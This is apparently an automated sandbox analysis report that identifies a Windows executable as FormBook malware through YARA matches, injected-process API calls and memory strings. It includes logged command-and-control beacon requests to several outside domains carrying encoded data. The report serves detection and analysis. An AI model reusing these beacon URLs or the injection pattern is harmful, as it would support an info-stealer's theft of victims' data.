Source: global traffic	HTTP traffic detected: GET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1Host: www.muldentaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1Host: www.gofourd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1Host: www.ihdeuruim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1Host: www.embraceblm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1Host: www.ytksw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1Host: www.buraktradingltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1Host: www.bogolacke.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1Host: www.albanyhumanesociety.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1Host: www.sandybottomsflipflops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.contorig2.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 06:41:48 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 76 33 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uv34/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004181B0 NtCreateFile,	3_2_004181B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418260 NtReadFile,	3_2_00418260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004182E0 NtClose,	3_2_004182E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418390 NtAllocateVirtualMemory,	3_2_00418390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004181AA NtCreateFile,	3_2_004181AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041825A NtReadFile,	3_2_0041825A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004182DA NtClose,	3_2_004182DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE98F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_00FE98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_00FE9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9840 NtDelayExecution,LdrInitializeThunk,	3_2_00FE9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE99A0 NtCreateSection,LdrInitializeThunk,	3_2_00FE99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_00FE9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9A50 NtCreateFile,LdrInitializeThunk,	3_2_00FE9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9A20 NtResumeThread,LdrInitializeThunk,	3_2_00FE9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_00FE9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE95D0 NtClose,LdrInitializeThunk,	3_2_00FE95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9540 NtReadFile,LdrInitializeThunk,	3_2_00FE9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE96E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_00FE96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_00FE9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9FE0 NtCreateMutant,LdrInitializeThunk,	3_2_00FE9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE97A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_00FE97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9780 NtMapViewOfSection,LdrInitializeThunk,	3_2_00FE9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9710 NtQueryInformationToken,LdrInitializeThunk,	3_2_00FE9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE98A0 NtWriteVirtualMemory,	3_2_00FE98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FEB040 NtSuspendThread,	3_2_00FEB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9820 NtEnumerateKey,	3_2_00FE9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE99D0 NtCreateProcessEx,	3_2_00FE99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9950 NtQueueApcThread,	3_2_00FE9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9A80 NtOpenDirectoryObject,	3_2_00FE9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9A10 NtQuerySection,	3_2_00FE9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FEA3B0 NtGetContextThread,	3_2_00FEA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9B00 NtSetValueKey,	3_2_00FE9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE95F0 NtQueryInformationFile,	3_2_00FE95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9560 NtWriteFile,	3_2_00FE9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FEAD30 NtSetContextThread,	3_2_00FEAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9520 NtWaitForSingleObject,	3_2_00FE9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE96D0 NtCreateKey,	3_2_00FE96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9670 NtQueryInformationProcess,	3_2_00FE9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9650 NtQueryValueKey,	3_2_00FE9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9610 NtEnumerateValueKey,	3_2_00FE9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9770 NtSetInformationFile,	3_2_00FE9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FEA770 NtOpenThread,	3_2_00FEA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9760 NtOpenProcess,	3_2_00FE9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FE9730 NtQueryVirtualMemory,	3_2_00FE9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FEA710 NtOpenProcessToken,	3_2_00FEA710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03308390 NtAllocateVirtualMemory,	7_2_03308390
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03308260 NtReadFile,	7_2_03308260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_033082E0 NtClose,	7_2_033082E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_033081B0 NtCreateFile,	7_2_033081B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330825A NtReadFile,	7_2_0330825A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_033082DA NtClose,	7_2_033082DA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_033081AA NtCreateFile,	7_2_033081AA

Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_00E55871	0_2_00E55871
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_00E559CA	0_2_00E559CA
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_00E55998	0_2_00E55998
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_00E56501	0_2_00E56501
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_0310B15C	0_2_0310B15C
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_0310C428	0_2_0310C428
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_03109890	0_2_03109890
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_0310DE90	0_2_0310DE90
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_0310FD5F	0_2_0310FD5F
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_0310FD70	0_2_0310FD70
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_057D4418	0_2_057D4418
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_057D6EF8	0_2_057D6EF8
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_057D6B70	0_2_057D6B70
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_057DA608	0_2_057DA608
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_057D8091	0_2_057D8091
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_057D8318	0_2_057D8318
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_057D6F50	0_2_057D6F50
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_057D6F95	0_2_057D6F95
Source: C:\Users\user\Desktop\00098765123POIIU.exe	Code function: 0_2_00E53C88	0_2_00E53C88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00401026	3_2_00401026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041BA6D	3_2_0041BA6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408C4C	3_2_00408C4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408C50	3_2_00408C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041B4B8	3_2_0041B4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402D87	3_2_00402D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C773	3_2_0041C773
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041BFFF	3_2_0041BFFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD20A0	3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBB090	3_2_00FBB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01061002	3_2_01061002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0107E824	3_2_0107E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010720A8	3_2_010720A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC4120	3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010728EC	3_2_010728EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FAF900	3_2_00FAF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01072B28	3_2_01072B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106DBD2	3_2_0106DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010603DA	3_2_010603DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0105FA2B	3_2_0105FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FDEBB0	3_2_00FDEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010722AE	3_2_010722AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01072D07	3_2_01072D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01071D55	3_2_01071D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_010725DD	3_2_010725DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FB841F	3_2_00FB841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FBD5E0	3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106D466	3_2_0106D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FD2581	3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FA0D20	3_2_00FA0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0107DFCE	3_2_0107DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00FC6E30	3_2_00FC6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01071FF1	3_2_01071FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0106D616	3_2_0106D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_01072EF7	3_2_01072EF7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330C773	7_2_0330C773
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032F2FB0	7_2_032F2FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032F2D87	7_2_032F2D87
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032F2D90	7_2_032F2D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032F8C4C	7_2_032F8C4C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_032F8C50	7_2_032F8C50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0330B4B8	7_2_0330B4B8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: String function: 00FAB150 appears 45 times

Source: 00098765123POIIU.exe, 00000000.00000002.337981677.0000000003303000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.336669246.0000000000F3E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameApplicationStateDisposition.exeF vs 00098765123POIIU.exe
Source: 00098765123POIIU.exe, 00000000.00000002.339649997.0000000004378000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs 00098765123POIIU.exe
